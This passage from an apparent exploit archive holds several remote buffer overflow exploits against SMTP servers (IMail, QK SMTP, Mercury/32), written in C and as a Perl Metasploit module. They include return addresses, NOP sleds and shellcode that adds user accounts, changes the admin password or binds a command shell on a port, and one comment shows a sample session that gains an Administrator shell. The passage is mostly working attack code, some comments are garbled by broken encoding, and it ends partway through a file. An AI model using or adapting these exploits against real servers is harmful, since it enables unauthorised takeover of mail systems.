}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL)
{
printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
// JMP to EAX = Results in a Corrupted Stack
// so instead we POP EBP, RET to restore pointer and then return
// this causes code procedure to continue
/*
['IMail 8.x Universal', 0x10036f71 ],
['Windows 2003 SP1 English', 0x7c87d8af ],
['Windows 2003 SP0 English', 0x77d5c14c ],
['Windows XP SP2 English', 0x7c967e23 ],
['Windows XP SP1 English', 0x71ab389c ],
['Windows XP SP0 English', 0x71ab389c ],
['Windows 2000 Universal English', 0x75021397 ],
['Windows 2000 Universal French', 0x74fa1397],
['Windows XP SP1 - SP2 German', 0x77d18c14],
*/
char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and :
char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23
char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71
char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c
char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397
char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397
char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14
char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work.
// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
// After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works
// On all versions from 8.x to 2006 (9.x?)
char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload.
memset(overflow, 0, 1028);
strcat(overflow, Exp);
if (JMP == 1)
{
printf("Using IMail 8.15 SMTDP.DLL JMP\n");
strcat(overflow, IMail815);
} else if (JMP == 2)
{
printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
strcat(overflow, Win2k3SP1E);
} else if (JMP == 3)
{
printf("Using Win2003 SP0 USER32.DLL JMP\n");
strcat(overflow, Win2k3SP0E);
} else if (JMP == 4)
{
printf("Using WinXP SP2 NTDLL.DLL JMP\n");
strcat(overflow, WinXPSP2E);
} else if (JMP == 5)
{
printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
strcat(overflow, WinXPSP1);
} else if (JMP == 6)
{
printf("Using Win2000 Universal English USER32.DLL JMP\n");
strcat(overflow, Win2KE);
} else if (JMP == 7)
{
printf("Using Win2000 Universal French USER32.DLL JMP\n");
strcat(overflow, Win2KF);
} else if (JMP == 8)
{
printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
strcat(overflow, WinXPG);
} else {
printf("Using IMail 8.15 SMTDP.DLL JMP\n");
strcat(overflow, IMail815);
}
// Setup Payload Options
if (atoi(argv[3]) == 1)
{
printf("Using Root Share Payload\n");
plen = 544 - ((strlen(RootShare) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, RootShare);
} else if (atoi(argv[3]) == 2)
{
printf("Using Add User Payload\n");
plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, AddUser);
} else if (atoi(argv[3]) == 3)
{
printf("Using Win32 CMD Bind Payload\n");
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
} else if (atoi(argv[3]) == 4)
{
printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n");
plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, ChangeAdmin);
} else
{
printf("Using Win32 CMD Bind Payload\n");
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
}
// Dont forget to add the trailing characters to set up stack overflow
strcat(overflow, tail);
// Connect to SMTP Server and Setup Up Email
char EHLO[] = "EHLO \r\n";
char MF[] = "MAIL FROM <TEST@TEST> \r\n";
send(sockfd, EHLO, strlen(EHLO), 0);
Sleep(1000);
send(sockfd, MF, strlen(MF), 0);
Sleep(1000);
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
printf("ERROR: Send Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Exploit Sent.....\r\n");
if (atoi(argv[3]) == 3)
{
printf("Check Shell on Port 4444\n");
closesocket(sockfd);
WSACleanup();
exit(0);
}
printf("Checking If Exploit Executed....\r\n");
Sleep(1000);
closesocket(sockfd);
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("Exploit Successfully Delivered!\n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
printf("...");
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("Exploit Successfully Delivered!\n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL)
{
printf("Exploit Successfully Delivered!\n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
printf("Exploit Failed: Try A different JMP Method or Payload\n");
closesocket(sockfd);
WSACleanup();
exit (1);
}
// [2006-10-19]
25 QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 25\10\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP
* MxM .mmm
* W"W """
[i] Title: QK SMTP <= 3.01 RCPT-TO Buffer Overflow Exploit
[i] Discovered by: Greg Linares
[i] Exploit by: Expanders - expanders [aaat] gmail [dooot] com
[i] References: http://www.securityfocus.com/bid/20681 --- http://www.qksoft.com/
[i] Greatings: x0n3-h4ck - netbunny
[ Research diary ]
Ok.. I'm ready to write some lines about this exploit..
I've encountered some problems during development:
ESI and ESP points to our buffer, in a memory location that will be contaminated with some bytes after
storing our data. result: I coulnt put shellcode directly here because it will be changed.
So i had to write a short jmpback unicode-proof shellcode using venetian tecnique.
Because of some unknown reasons i was not able to get a socket-based shellcode working..
in this exploit I use an ADD USER shellcode.
[ Timeline ]
Vendor has been informed and version 3.10b has been released.
[ Notes ]
RETcode type: POINTER TO [ESP]
To improve realiability you can search your own RETcodes..
[ Documentation ]
Venetian exploit: http://www.net-security.org/dl/articles/unicodebo.pdf
Skylined Alpha2 : www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php
[ Special Thanks ]
Skylined
H D Moore
Greg Linares
[ Links ]
www.x0n3-h4ck.org
www.netbunny.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
// You may want to change this, is the user and the password of shellcode added user
#define NETADD_USER "x0n3"
#define NETADD_PASS "h4ck"
// Exploit internal constant, change only if you know what you are doing
#define HELO "EHLO\r\n"
#define MAIL_FROM "MAIL FROM: <[email protected]>\r\n"
#define BUGSTR "RCPT TO: %s@****.com>\r\n"
#define BUFFSIZE 10000
#define SC_MAX_SIZE 800
#define MAX_ENCODED_LEN 100
// Offsets
#define RET_OFFSET 296
#define JMPBACK_OFFSET 4089
#define SHELLCODE_OFFSET 2524
int encode_alphanum(unsigned char *src,unsigned char *dest,int len);
int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );
// win32 ADD user un-encoded shellcode taken from metasploit [ tnx hdm & vlas902 ]
// encoded using Skylined alpha2 tool
char alphanum_shellcode[] =
// Skylined's alpha2 unicode decoder
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI AQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
"BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
// Encoded opcodes
"ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDK oDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
"kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBk MLRkzajKQyQLmTM45sNQUpotRkmplp"
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMl aOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
"C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRU psqUPrmP%skp%s"
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQ otPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
"MPNOOQa4oTkPA";
// Fully customizable UNICODE-PROOF jmpback shellcode
// Written with venetian tecnique to jmpback as more as possible using as less as possible bytes
// Note that \x73 is "add byte ptr [ebx],dh", ebx point to a useless but writable location so
// we can use this instruction as a unicode NOP to realign with our next instruction
unsigned char jmpback[] =
"\x50\x73" // push eax |
"\x54\x73" // push esp | Workaroung for "xchg eax,esp" cos 0x96 is filtered
"\x58\x73" // pop eax |____
"\xB0" // mov al,0x0 | Set last eax byte to zero..
"\x48\x73" // dec ax | ..and next we decrement eax
"\xB0\x48\x73"
"\xB0\x48\x73" // | Again...
"\xB0\x48\x73" // | ...and angain
"\xB0\x48\x73"
"\xB0\x48\x73" // | every time it substract 0xFF to eax
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\x48\x73"// | eax is aligned to the shellcode
"\x50\x73" // push eax
"\xC3\x73"; // retn
//"\x50\x73\xBA\xAA\xAA\x73\x52\x73\xC3\x73"; // push eax = 0xAA00AA00 and retn !!DEBUG!!
struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "Windows NT Universal", 0x77cec080 }, // shell32.dll push esp, ret [Tnx to metasploit]
{ "Windows 2k SP 4" , 0x75031dce }, // ws2_32.dll push esp, ret [Tnx to metasploit]
{ "Windows XP SP 0/1" , 0x71ab7bfb }, // ws2_32.dll jmp esp [Tnx to metasploit]
{ "Windows XP SP 2 ENG" , 0x71ab9372 }, // ws2_32.dll push esp, ret [Tnx to metasploit]
{ "Windows XP SP 2 ITA" , 0x77D92CFC }, // user32.dll jmp esp
{ NULL }
};
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tQK SMTP Remote RCPT-TO Buffer overflow\n");
printf("[i] Discovered by:\tGreg Linares\n");
printf("[i] Exploit by: \tExpanders\n\n");
return 0;
}
int usage(char *filename) {
int i;
printf("Usage: \t%s <host> <port> <targ>\n\n",filename);
printf(" \t<host> : Victim's host\n");
printf(" \t<port> : Victim's port :: Default: 25\n");
printf(" \t<targ> : Target from the list below\n\n");
printf("# \t Platform\n");
printf("-----------------------------------------------\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);
printf("-----------------------------------------------\n");
exit(0);
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit ( 1 );
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,position;
char encoded_user[MAX_ENCODED_LEN];
char encoded_pass[MAX_ENCODED_LEN];
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
char shellcode[SC_MAX_SIZE];
banner();
if( (argc != 4) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
printf("[+] Target OS is: %s\n",targets[atoi(argv[3])].platform);
printf("[+] Creating evil buffer...");
fflush(stdout);
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(BUGSTR));
memset(buffer,0x73,BUFFSIZE); // Fill with unicode nops
memset(buffer+4000,0x45,1000);
encode_alphanum(encoded_user,NETADD_USER,strlen(NE TADD_USER));
encode_alphanum(encoded_pass,NETADD_PASS,strlen(NE TADD_PASS));
sprintf(shellcode,alphanum_shellcode,encoded_user, encoded_pass,encoded_user);
memcpy(buffer+RET_OFFSET,&targets[atoi(argv[3])].addr,4);
memcpy(buffer+SHELLCODE_OFFSET,shellcode,strlen(sh ellcode));
memcpy(buffer+JMPBACK_OFFSET,jmpback,strlen(jmpbac k));
memset(buffer+4500,0x00,1);
printf("done\n");
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
//rcv=recv(s,recvbuf,256,0);
if((rcv = recv(s,recvbuf,256,0)) < 0)
{
printf("\n[X] Error while recieving banner!\n");
exit( 1 );
}
if (strstr(recvbuf,"QK SMTP")!=0)
{
sleep(1);
sprintf(request,"%s",HELO);
printf("[+] Sending EHLO\n");
if ( send ( s, request, strlen(request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
sleep(1);
sprintf(request,"%s",MAIL_FROM);
printf("[+] Sending MAIL FROM\n");
if ( send ( s, request, strlen(request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
sleep(1);
sprintf(request,BUGSTR,buffer);
printf("[+] Sending EXPLOIT\n");
if ( send ( s, request, strlen(request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
sleep(1);
printf("[+] Done - New account should have been added:\n");
printf("[i] LOGIN:\t%s\n",NETADD_USER);
printf("[i] PASSWORD:\t%s\n",NETADD_PASS);
printf("[+] Exploit now hangs up. see ya.\n\n");
} else
printf("[X] This server is not running QK SMTP\n");
close(s);
free(buffer);
free(request);
return 0;
}
// Ripped from Skylined's alpha2.c
int encode_alphanum(unsigned char *dest,unsigned char *src,int len){
char dump[2];
int i,n, input, A, B, C, D, E, F;
char* valid_chars;
struct timeval tv;
struct timezone tz;
memset(dest,0x00,MAX_ENCODED_LEN);
gettimeofday(&tv, &tz);
srand((int)tv.tv_sec*1000+tv.tv_usec);
valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno pqrstuvwxyz";
for(n=0;n<len;n++) {
input = src[n];
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
D = (A-E) & 0x0f;
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
C = valid_chars[i] >> 4;
sprintf(dump,"%c%c", (C<<4)+D, (E<<4)+F);
strcat(dest,dump);
}
return 0;
}
// [2006-10-25]
25 Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'],
},
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x20\x3e\x22\x40",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
If we send a long strings for RCPT TO command contained within the characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),
'Refs' =>
[
['BID', '19885'],
['CVE', '2006-4379'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
],
'Targets' =>
[
['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12
],
'DefaultTarget' => 0,
'Keys' => ['smtp'],
'DisclosureDate' => 'September 7 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $ehlo = "EHLO " . "\r\n";
my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
my $pattern = "\x20\x3c\x40";
$pattern .= pack('V', $target->[1]);
$pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
$pattern .= $shellcode;
$pattern .= "\x4a\x61\x63\x3e";
my $request = "RCPT TO: " . $pattern ."\n";
$self->PrintLine(sprintf (" Trying ".$target->[0]." using pop eax, ret at 0x%.8x...", $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->Recv(-1, 5);
$s->Send($ehlo);
$self->PrintLine(" I'm sending ehlo command");
$self->PrintLine(" $r");
sleep(2);
$s->Send($mail_from);
$self->PrintLine(" I'm sending mail from command");
$r = $s->Recv(-1, 10);
$self->PrintLine(" $r");
sleep(2);
$s->Send($request);
$self->PrintLine(" I'm sending rcpt to command");
sleep(2);
return;
}
# [2007-02-04]
25 Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit
/*
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
Public Version 1.0
http://www.ph4nt0m.org
2007-08-22
Code by: Zhenhan.Liu
Original POC: http://www.enigmagroup.org/exploits/4294
Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
Our Mail-list: http://list.ph4nt0m.org (Chinese)
It will bind a cmdshell on port 1154 if successful.
Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
== Public Version 1.0
== http://www.ph4nt0m.org 2007-08-22
connect to 127.0.0.1:25 ... OK!
[C] EHLO void#ph4nt0m.org
[S] 220 root ESMTP server ready.
[S] 250-root Hello void#ph4nt0m.org; ESMTPs are:
250-TIME
[S] 250-SIZE 0
[S] 250 HELP
[C] AUTH CRAM-MD5
[S] 334 PDM0OTg4MjguMzQ2QHJvb3Q+
[C] Send Payload...
[-] Done! cmdshell@1154?
Z:\Exp\Mercury SMTPD\Mercury SMTPD>nc -vv 127.0.0.1 1154
DNS fwd/rev mismatch: localhost != gnu
localhost [127.0.0.1] 1154 (?) open
Microsoft Windows XP [°æ±¾ 5.1.2600]
(C) °æȨËÃ� �Óà1985-2001 Microsoft Corp.
e:\MERCURY>whoami
whoami
Administrator
*/
#include <io.h>
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
/* win32_bind - EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */
unsigned char shellcode[] =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x 07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x 24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x 6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x 1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x 66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x 3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\x d0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x 43\x53\xff\xd0"
"\x66\x68\x04\x82\x66\x53\x89\xe1\x95\x68\xa4\x1a\x 70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x 57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x 54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\x d0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\x e7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x 5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\x d9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\x c4\x64\xff\xd6"
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\x d0";
// Base64×Ö·û¼ ¯
__inline char GetB64Char(int index)
{
const char szBase64Table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";
if (index >= 0 && index < 64)
return szBase64Table[index];
return '=';
}
// ´ÓË«×Ã� �–ÖÃÂÈ¡µÃ� ��¥Ã—Ö½Ú
#define B0(a) (a & 0xFF)
#define B1(a) (a >> 8 & 0xFF)
#define B2(a) (a >> 16 & 0xFF)
#define B3(a) (a >> 24 & 0xFF)
// ±àÂëºóµÃÂ� ��³¤¶ÈÒÃ� �»Â°Ã£Â±ÃˆÃ”à ‚Â*ÎĶàÕ¼1/3µÄ´æ´Â ¢Â¿Ã•Â¼Ã¤Â£à ‚¬Ã‡Ã«Â±Â£ÃÂ� �¤base64codeÓÃÂ×à £Â¹Â»ÂµÃ„¿� �ƒÂ•Ã‚¼Ã¤
inline int Base64Encode(char * base64code, const char * src, int src_len)
{
if (src_len == 0)
src_len = strlen(src);
int len = 0;
unsigned char* psrc = (unsigned char*)src;
char * p64 = base64code;
for (int i = 0; i < src_len - 3; i += 3)
{
unsigned long ulTmp = *(unsigned long*)psrc;
register int b0 = GetB64Char((B0(ulTmp) >> 2) & 0x3F);
register int b1 = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F);
register int b2 = GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F);
register int b3 = GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F);
*((unsigned long*)p64) = b0 | b1 << 8 | b2 << 16 | b3 << 24;
len += 4;
p64 += 4;
psrc += 3;
}
// ´¦ÀÃÂ*×ÃÂ� �ºóÓàõIJÂ� �»ÃƒÂ—ã3×Ö½à ƒÂšÃ‚µÃ„¶öÊ� �ƒÂ½Ã‚¾ÃÂ
if (i < src_len)
{
int rest = src_len - i;
unsigned long ulTmp = 0;
for (int j = 0; j < rest; ++j)
{
*(((unsigned char*)&ulTmp) + j) = *psrc++;
}
p64[0] = GetB64Char((B0(ulTmp) >> 2) & 0x3F);
p64[1] = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F);
p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : '=';
p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : '=';
p64 += 4;
len += 4;
}
*p64 = '\0';
return len;
}
char* GetErrorMessage(DWORD dwMessageId)
{
static char ErrorMessage[1024];
DWORD dwRet;
dwRet = FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM, // source and processing options
NULL, // pointer to message source
dwMessageId, // requested message identifier
0, //dwLanguageId
ErrorMessage, //lpBuffer
1024, //nSize
NULL //Arguments
);
if(dwRet)
return ErrorMessage;
else
{
sprintf(ErrorMessage, "ID:%d(%08.8X)", dwMessageId, dwMessageId);
return ErrorMessage;
}
}
int MakeConnection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
int check_recv(SOCKET s, char* str_sig)
{
char buf[1024];
int ret;
for(;;)
{
memset(buf, 0, sizeof(buf));
ret = recv(s, buf, sizeof(buf), 0);
if(ret > 0)
{
printf("[S] %s", buf);
}
else
{
printf("[-] recv() %s\n", GetErrorMessage(GetLastError()));
closesocket(s);
ExitProcess(-1);
}
if(strstr(buf, str_sig))
{
break;
}
else
{
continue;
}
} //for(;;)
return ret;
}
int check_send(SOCKET s, char* buf, unsigned int buf_len)
{
int ret;
ret = send(s, buf, buf_len, 0);
if( ret >0)
{
return ret;
}
else
{
printf("[-] send() %s\n", GetErrorMessage(GetLastError()));
closesocket(s);
ExitProcess(-1);
}
}
